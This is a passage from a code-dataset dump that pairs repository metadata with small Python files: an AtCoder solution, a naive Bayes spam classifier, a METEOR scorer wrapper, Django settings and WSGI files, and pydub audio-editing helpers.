] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 255 | py | # -*- coding: utf-8 -*-
def main():
import sys
input = sys.stdin.readline
s = input().rstrip()
for i, si in enumerate(s, 1):
if si.isupper():
print(i)
exit()
if __name__ == "__main__":
main()
| [
"k.hiro1818@gmail.com"
] | k.hiro1818@gmail.com |
f4889ab3192e5b2391525b80f2cd647d5ffb097f | 61ef327bd1d5ff6db7595221db6823c947dab42b | /FlatData/ScenarioCharacterAction.py | a9f4a598c4032f027b4141bed04cca067ccf7dac | [] | no_license | Aikenfell/Blue-Archive---Asset-Downloader | 88e419686a80b20b57a10a3033c23c80f86d6bf9 | 92f93ffbdb81a47cef58c61ec82092234eae8eec | refs/heads/main | 2023-09-06T03:56:50.998141 | 2021-11-19T12:41:58 | 2021-11-19T12:41:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: FlatData
class ScenarioCharacterAction(object):
Idle = 0
Shake = 1
Greeting = 2
FalldownLeft = 3
FalldownRight = 4
Stiff = 5
Hophop = 6
Jump = 7
| [
"rkolbe96@gmail.com"
] | rkolbe96@gmail.com |
3ca3cfe18c48de8901db82c058c6aa30b28b11fb | 62255db1163d1c097c87412f213555fe26c49262 | /pangram/pangram.py | 0680416ce10b4e2d1d96bde1ff514ad69d156309 | [] | no_license | lazhenko/my_projects | 6967ed8a2a1ec1b25c3049f5e9acc6b77c77ca91 | 421661c24bc50975ad5d324df9a3332ea843de95 | refs/heads/master | 2023-07-07T04:00:11.692611 | 2021-08-13T19:13:50 | 2021-08-13T19:13:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from string import ascii_lowercase
def is_pangram(string):
Alphabet = set(ascii_lowercase)
return Alphabet.issubset(string.lower())
| [
"mailkraivn@gmail.com"
] | mailkraivn@gmail.com |
e48fd8b191b8ec5f3399d0223533e0b66640bfc8 | e5bc4b33fffb6c9dfccc38ab2b5db4e6535a4b39 | /nbclassify_part2.py | 5eed626be061733bbfe05b5e895c3540511b36e2 | [] | no_license | ashwini1708/NLP-Project-Naive-Bayes-Classifier | ddf002c49e08a7592daec5afb4a08cb76720c876 | e8d4872b4a8ea5dc86309fa9464903f4e0780425 | refs/heads/master | 2021-01-18T03:53:46.342299 | 2017-03-22T03:22:06 | 2017-03-22T03:22:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,423 | py | import sys
import os
import json
import math
from math import log10
record=[]
def classify(src):
intermediate_output= open("nbmodel.txt", "r", encoding="latin1")
for line in intermediate_output:
record.append(json.loads(line))
probability=record[0]
words=record[1]
spam_dic=record[2]
ham_dic=record[3]
# FETCHING ACTUAL FILE COUNT
file_counter_ham=0
file_counter_spam=0
spam_counter=0
ham_counter=0
correct_spam=0
correct_ham=0
for root, dirs, files in os.walk(src):
for fname in files:
if "ham" in fname:
file_counter_ham=file_counter_ham +1
elif "spam" in fname:
file_counter_spam=file_counter_spam +1
try:
os.remove('nboutput.txt')
except OSError:
pass
f = open('nboutput.txt', 'w')
for root, dirs, files in os.walk(src):
for file in files:
if file.endswith(".txt"):
file_open=open(root + "/" + file, "r", encoding="latin1").read()
tokens=file_open.split()
prob_spam_words = 0.0
prob_ham_words = 0.0
for i in tokens:
if i in spam_dic:
prob_spam_words = (prob_spam_words) + spam_dic[i]
# else:
# prob_spam_words+=0.0
if i in ham_dic:
prob_ham_words = (prob_ham_words) + (ham_dic[i])
# else:
# prob_ham_words+=0.0
prob_spam_words=log10(probability[0]) + (prob_spam_words)
prob_ham_words = log10(probability[1]) +(prob_ham_words)
if(prob_spam_words > prob_ham_words):
f.write("spam" +" " + root + '/' + file + "\n")
spam_counter=spam_counter+1
elif(prob_spam_words < prob_ham_words):
f.write("ham" +" " + root + '/'+ file + "\n")
ham_counter=ham_counter+1
else:
f.write(root + file + "\n")
f.close()
output = open("nboutput.txt", "r", encoding="latin1").readlines()
for line in output:
line=line.split()
# print (line[0])
# print(line[1])
if line[0].lower() in line[1]:
if line[0].lower() == "spam":
correct_spam=correct_spam + 1
else:
correct_ham = correct_ham + 1
#calculating precision
#precision = (correctly classified as ck) / (classified as ck)
precision_spam=correct_spam / spam_counter
precision_ham = correct_ham / ham_counter
# REcall = (correctly classified as ck) / (belongs to ck)
recall_spam=correct_spam / file_counter_spam
recall_ham = correct_ham / file_counter_ham
# F-score calculation
f_score_spam =(2* precision_spam * recall_spam )/ (precision_spam + recall_spam)
f_score_ham = (2 * precision_ham * recall_ham) / (precision_ham + recall_ham)
print ("precison spam is " ,precision_spam )
print("precison ham is ", precision_ham)
print("recall spam is ", recall_spam)
print("recall ham is ", recall_ham)
print("F score spam is" ,f_score_spam )
print("F score ham is", f_score_ham)
avg_weight = ((f_score_ham + f_score_spam) / 2)
print("weighted Avg : ", avg_weight)
classify(sys.argv[1]) | [
"noreply@github.com"
] | ashwini1708.noreply@github.com |
cb0d0235383af6ed0f9cf485e18c73f882f87d6c | 56297e13de0b916468d9474b903961dc033617c1 | /Django/python_belt - Copy/python_belt/settings.py | 9f7a01b8b056498909a8075223894c0a3dd757de | [] | no_license | faizanrahman/Python-Stack | d36f841eea648df31bbbb4576d1a2aae1a3b0aa6 | ccdec31f4fac01da701f61437fdf3614badf8ce9 | refs/heads/master | 2022-11-08T08:25:54.525633 | 2019-01-03T03:05:45 | 2019-01-03T03:05:45 | 163,916,233 | 0 | 0 | null | 2022-11-01T13:29:45 | 2019-01-03T03:01:12 | Python | UTF-8 | Python | false | false | 3,130 | py | """
Django settings for python_belt project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$imzq*k4xrl5$z0w3@6w0@55vok0pq2y_f^vqtwqv0jl6%*z32'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.loginapp',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'python_belt.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'python_belt.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"faizanrahman89@gmail.com"
] | faizanrahman89@gmail.com |
a24cc4135e73aa701d1e7b6ffe6394d037b3b69b | 49f9f728a0f640a2972cb1c00105941536169b67 | /pic/wsgi.py | f416491e871f25797cf3fdf4ab8605952cc4355d | [] | no_license | Captainfeii/my-first-upload | 453c2fc56d4d13f5730aedeea4f0f5063f965e33 | 9e1d95c411375d972e2ea4c16adc3718892bf24f | refs/heads/master | 2020-03-23T10:16:11.049963 | 2018-07-18T12:44:47 | 2018-07-18T12:44:47 | 141,434,213 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | """
WSGI config for pic project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pic.settings")
application = get_wsgi_application()
| [
"582752944@qq.com"
] | 582752944@qq.com |
4507b0a0250c6b95f949cf60bfc101f8efbe17ef | 17124c2268d7d7b0e9545a1ddaf293a49fafcf72 | /seq2seq/evaluation/meteor/meteor.py | 4a9c0696a513d24b74e15736ecb66a7501dbe317 | [] | no_license | haxzie-xx/code-to-comment | 56fadaf3b1be36daf2450159740cbd7d660fa438 | 5007d96c0e5ced57dcee7485a200a0e0a2c11e7d | refs/heads/master | 2020-04-28T15:22:14.721580 | 2019-03-13T08:35:06 | 2019-03-13T08:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,077 | py | #!/usr/bin/env python
# Python wrapper for METEOR implementation, by Xinlei Chen
# Acknowledge Michael Denkowski for the generous discussion and help
import os
import sys
import subprocess
import threading
# Assumes meteor-1.5.jar is in the same directory as meteor.py. Change as needed.
METEOR_JAR = 'meteor-1.5.jar'
# print METEOR_JAR
class Meteor:
def __init__(self):
self.meteor_cmd = ['java', '-jar', '-Xmx2G', METEOR_JAR, \
'-', '-', '-stdio', '-l', 'en', '-norm']
self.meteor_p = subprocess.Popen(self.meteor_cmd, \
cwd=os.path.dirname(os.path.abspath(__file__)), \
stdin=subprocess.PIPE, \
stdout=subprocess.PIPE, \
stderr=subprocess.PIPE)
# Used to guarantee thread safety
self.lock = threading.Lock()
# gts = reference list
# res = hypotheses
def compute_score(self, gts, res):
assert(gts.keys() == res.keys())
imgIds = gts.keys()
scores = []
eval_line = 'EVAL'
self.lock.acquire()
for i in imgIds:
assert(len(res[i]) == 1)
stat = self._stat(res[i][0], gts[i])
eval_line += ' ||| {}'.format(stat)
self.meteor_p.stdin.write('{}\n'.format(eval_line))
for i in range(0,len(imgIds)):
scores.append(float(self.meteor_p.stdout.readline().strip()))
score = float(self.meteor_p.stdout.readline().strip())
self.lock.release()
return score, scores
def method(self):
return "METEOR"
def _stat(self, hypothesis_str, reference_list):
# SCORE ||| reference 1 words ||| reference n words ||| hypothesis words
hypothesis_str = hypothesis_str.replace('|||','').replace(' ',' ')
score_line = ' ||| '.join(('SCORE', ' ||| '.join(reference_list), hypothesis_str))
self.meteor_p.stdin.write('{}\n'.format(score_line))
return self.meteor_p.stdout.readline().strip()
def _score(self, hypothesis_str, reference_list):
self.lock.acquire()
# SCORE ||| reference 1 words ||| reference n words ||| hypothesis words
hypothesis_str = hypothesis_str.replace('|||','').replace(' ',' ')
score_line = ' ||| '.join(('SCORE', ' ||| '.join(reference_list), hypothesis_str))
self.meteor_p.stdin.write('{}\n'.format(score_line))
stats = self.meteor_p.stdout.readline().strip()
eval_line = 'EVAL ||| {}'.format(stats)
# EVAL ||| stats
self.meteor_p.stdin.write('{}\n'.format(eval_line))
score = float(self.meteor_p.stdout.readline().strip())
# bug fix: there are two values returned by the jar file, one average, and one all, so do it twice
# thanks for Andrej for pointing this out
score = float(self.meteor_p.stdout.readline().strip())
self.lock.release()
return score
def __exit__(self):
self.lock.acquire()
self.meteor_p.stdin.close()
self.meteor_p.kill()
self.meteor_p.wait()
self.lock.release() | [
"tjalling_haije@outlook.com"
] | tjalling_haije@outlook.com |
3fb6596f25e82ad3306342bc206831a44c1a8f19 | 16f50a812eca90748e87bfe471e0c05f178337fd | /4to_Semestre/Metodos computacionales/Racket/Actividad 3.4 Final/Examples/example.py | 4fb7031bd1d767a5b0850a0aeefe25131ea51227 | [] | no_license | SeaWar741/ITC | 65f73365762366f56cfbd6d0bc788cd384672d12 | 5f75716be58ca6e00bcd8dae7546fd19fe37657f | refs/heads/master | 2023-02-05T23:25:13.972031 | 2022-09-29T10:38:32 | 2022-09-29T10:38:32 | 205,020,772 | 4 | 2 | null | 2023-01-19T15:28:45 | 2019-08-28T20:48:35 | Jupyter Notebook | UTF-8 | Python | false | false | 288 | py | # Python Program to find the factors of a number
# This function computes the factor of the argument passed
def print_factors(x ) :
print( " The factors of " , x , " are: " )
for i in range( 1 , x + 1 ) :
if x % i == 0:
print( i )
num = 320
print_factors( num ) | [
"juanca741@gmail.com"
] | juanca741@gmail.com |
6e643496ecb597de33e522329bf295891b5a62e1 | 108f12e6a8acd23e89ba5d6972d46647c71a62d2 | /ImPloc-revision/model/result.py | 4c6bef4331b397389c819604668e999779122cca | [] | no_license | YutLan/CS385Project-1 | 62e30083c520be5dda758d64dc975f1cad8ed9d5 | 5e6c7a3b963a398ee2c8e80aa1ef91cea7370f11 | refs/heads/master | 2022-11-12T03:08:09.324853 | 2020-06-28T11:00:25 | 2020-06-28T11:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# merge kfold result
import os
import pandas as pd
def merge_agg(fv="slf"):
if fv == 'slf':
srcdir = os.path.join("result-paper/agg_slf")
elif fv == "cnnfeat":
srcdir = os.path.join("result-paper/cnnfeat")
else:
srcdir = os.path.join("result-paper/agg_resnet")
methods = os.listdir(srcdir)
folds = list(range(1, 11))
perf = {}
for m in methods:
for fold in folds:
sid = m + "_" + fv + "_fold" + str(fold)
perf[sid] = {}
path = os.path.join(srcdir, m, "fold%d.txt" % fold)
perf[sid]['model'] = m
perf[sid]["fold"] = fold
with open(path, 'r') as f:
for line in f.readlines():
key, value = [
x.strip() for x in line.strip("\n").split(":")]
perf[sid][key] = value
df = pd.DataFrame(perf).T
outf = os.path.join(srcdir, "result.csv")
df.to_csv(outf)
if __name__ == "__main__":
# merge_agg("slf")
# merge_agg("resnet")
merge_agg("cnnfeat")
| [
"curryjam_cg@sjtu.edu.cn"
] | curryjam_cg@sjtu.edu.cn |
e7a39938e98fc492d197143c76952b59f8476916 | ac1f67d2757c9c75a7d3e2491afde3e17acbc2b6 | /crocomire.wsgi | e69a10e933b6c2d964447fe7e5a9a377cde51eab | [] | no_license | tewtal/crocomire | 049164c479155e4dd5129e6ac90dde0c66dfce05 | db6d26f4c1c3db5cbf82d467662286d43f60dc36 | refs/heads/master | 2021-01-20T00:58:41.020391 | 2015-10-21T20:51:28 | 2015-10-21T20:51:28 | 44,681,456 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | wsgi | import sys
import os
from werkzeug.debug import DebuggedApplication
sys.path.insert(0, '/var/www/crocomi.re/')
import monitor
monitor.start(interval=1.0)
monitor.track(os.path.join(os.path.dirname(__file__), 'site.cf'))
from crocomire import app
#application = DebuggedApplication(app, True)
application = app
| [
"total@ceres.viskos.org"
] | total@ceres.viskos.org |
b559b0f74e82358f594c0ca321b4f0416d12288a | 09d6e0e85f57a8fe64b3920263a73c7433568260 | /src/controller.py | 91cf5c2cef6063eb9d557079c9a18e152f83cb87 | [
"MIT"
] | permissive | CHern0g0r/JB2020AudioAnomaiy | 0b6240193a9dc2168470858ba9de7762c1aaa032 | 6467c18e6c6f6768f8d7dc83fd93e8e42bc13368 | refs/heads/master | 2022-12-12T05:05:45.500479 | 2020-09-15T23:01:23 | 2020-09-15T23:01:23 | 295,376,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | from pydub import AudioSegment
folder = 'samples/'
def crop(audio_file, intervals):
song = AudioSegment.from_mp3(folder + audio_file)
new_inters = [0] + list(map(lambda x: x * 1000, intervals)) + [-1]
segments = [song[new_inters[i]: new_inters[i+1]]
for i in range(len(new_inters) - 1)]
for i, segment in enumerate(segments):
segment.export('{}{}_segment{}.mp3'.format(folder, audio_file[:-4], i),
format='mp3')
def concatenate(audio_files, filename):
segments = [AudioSegment.from_mp3(folder + f) for f in audio_files]
res = AudioSegment.empty()
for segment in segments:
res += segment
res.export(folder + filename, format='mp3')
def reverse(audio_file, filename):
song = AudioSegment.from_mp3(folder + audio_file)
backwards = song.reverse()
backwards.export(folder + filename, format='mp3')
| [
"fyodorchernogor@gmail.com"
] | fyodorchernogor@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.